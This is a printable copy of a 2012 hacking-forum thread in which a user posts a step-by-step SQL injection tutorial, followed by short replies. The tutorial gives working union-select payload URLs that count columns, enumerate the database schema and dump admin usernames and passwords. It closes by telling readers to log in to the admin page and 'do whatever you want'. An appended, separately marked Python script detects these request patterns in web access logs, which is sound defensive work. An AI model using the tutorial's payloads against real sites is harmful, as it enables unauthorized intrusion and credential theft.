Tutorial [Tutorial] Blazer First Sql Injection Tutorial!!!!! - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Tutorial [Tutorial] Blazer First Sql Injection Tutorial!!!!! (/Thread-Tutorial-Tutorial-Blazer-First-Sql-Injection-Tutorial)

[Tutorial] Blazer First Sql Injection Tutorial!!!!! - blazer15 - 12-13-2012

1. Find a vulnerable website. Here is an example!
2. http://www.site.com/index.php?=5' Ps
3. http://www.site.com/index.php?=5 order by 10-- error
http://www.site.com/index.php?=5 order by 9-- error
http://www.site.com/index.php?=5 order by 8-- No error :cheers:
4. The site has 8 columns.
5. Do like below
6. http://www.site.com/index.php?=-5 union select 1,2,3,4,5,6,7,8--
7. This will show some numbers on the page; let's say it is number 3 on the page.
8. Let's get some tables:
http://www.site.com/index.php?=-5 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables--
9. You will see tables: check for anything like admin, username, user. I found admin, and let's start harvesting
10. Type this:
http://www.site.com/index.php?=-5 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=database()--
11. Now you have the table name, and the name is admin, which you found before this. Now the columns that you will see right now are maybe Username or Password.
12. So to get the password and username from admin, type this.
13. http://www.site.com/index.php?=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8 from admin
14. And press enter.
15. You will see this: username:password. PS: the password can be plain text or in a hash
16. Now get the admin page and log in and do whatever you want.
17. Credits to blazer15. :cheers:

I tried my best! But I hope it will help you

RE: [Tutorial] Blazer First Sql Injection Tutorial!!!!! - Bannedshee - 12-13-2012

Great tutorial, I really need to learn more about SQLi, although please work on your grammar

RE: [Tutorial] Blazer First Sql Injection Tutorial!!!!! - blazer15 - 12-13-2012

(12-13-2012, 02:06 AM)Cyber-Savage Wrote: Great tutorial, I really need to learn more about SQLi, although please work on your grammar

Thank you very much

RE: [Tutorial] Blazer First Sql Injection Tutorial!!!!! - Kinanizer - 12-13-2012

Decent TUT, looks like you put it together in under 30 mins though. Might want to make it more of a walk-through.
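
Seen from the server side, the requests in the tutorial above leave a recognizable trail in the web access log. The following is an added example, not part of the original thread: it tags each request with the stage of the walkthrough it resembles and reports clients that progress through several stages. The log lines, IP addresses, stage names and threshold are constructed assumptions, and the patterns are heuristics keyed to this walkthrough.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Stages of the walkthrough, as they appear in a URL-decoded query string.
STAGES = [
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enumeration", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("data_extraction", re.compile(r"\bgroup_concat\s*\(", re.I)),
]
# Combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def classify(target):
    """Return the stage names whose pattern matches the decoded query string."""
    query = unquote_plus(urlsplit(target).query)
    return [name for name, rx in STAGES if rx.search(query)]

def scan(lines):
    """Map each client IP to the distinct stages it triggered, in first-seen order."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        ip, target, _status = m.groups()
        for stage in classify(target):
            seen = hits.setdefault(ip, [])
            if stage not in seen:
                seen.append(stage)
    return hits

def escalated(hits, threshold=3):
    """Clients that reached at least `threshold` distinct stages (assumed cut-off)."""
    return sorted(ip for ip, stages in hits.items() if len(stages) >= threshold)

# Constructed sample log: one client following the walkthrough, one benign client.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Dec/2012:02:00:01 +0000] "GET /index.php?=5%20order%20by%2010-- HTTP/1.1" 500 512',
    '203.0.113.7 - - [13/Dec/2012:02:00:05 +0000] "GET /index.php?=5%20order%20by%208-- HTTP/1.1" 200 4096',
    '203.0.113.7 - - [13/Dec/2012:02:00:09 +0000] "GET /index.php?=-5%20union%20select%201,2,3,4,5,6,7,8-- HTTP/1.1" 200 4100',
    '203.0.113.7 - - [13/Dec/2012:02:00:14 +0000] "GET /index.php?=-5+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables-- HTTP/1.1" 200 9000',
    '198.51.100.20 - - [13/Dec/2012:02:01:00 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 2048',
    '198.51.100.20 - - [13/Dec/2012:02:01:03 +0000] "GET /index.php?id=5 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    print(escalated(scan(SAMPLE_LOG)))
```

The benign search query matches a single pattern but never escalates, which is why the report keys on progression through stages rather than on any one keyword.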